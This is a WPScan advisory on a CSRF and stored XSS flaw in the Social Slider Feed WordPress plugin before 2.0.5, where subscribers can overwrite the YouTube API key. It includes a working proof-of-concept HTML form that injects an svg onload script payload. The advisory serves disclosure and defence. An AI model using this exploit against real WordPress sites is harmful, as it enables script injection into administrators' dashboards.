WordPress Plugin Vulnerabilities
Social Slider Feed < 2.0.5 - Subscriber+ Arbitrary API Key Update to Stored XSS
Description
The plugin does not have authorisation and CSRF check in place when saving the YouTube API Key, and does not sanitise as well as escape it. As a result, users with a role as low as subscriber could change it, including setting it with Stored Cross-Site Scripting payloads in it
Proof of Concept
As any authenticated user, such as subscriber. Or via CSRF against them <html> <body> <form action="https://example.com/wp-admin/admin.php?page=settings-wisw" method="POST"> <input type="hidden" name="wyt_api_key" value='a"><svg/onload=alert(/XSS/)>' /> <input type="submit" value="Submit request" /> </form> </body> </html> Despite the "Sorry, you are not allowed to access this page." error, the API Key will be updated The XSS will be triggered when viewing the Profile Dashboard (wp-admin/admin.php?page=settings-wisw)
Affects Plugins
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
WPScan
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-08-01 (about 1 years ago)
Added
2022-08-01 (about 1 years ago)
Last Updated
2022-08-01 (about 1 years ago)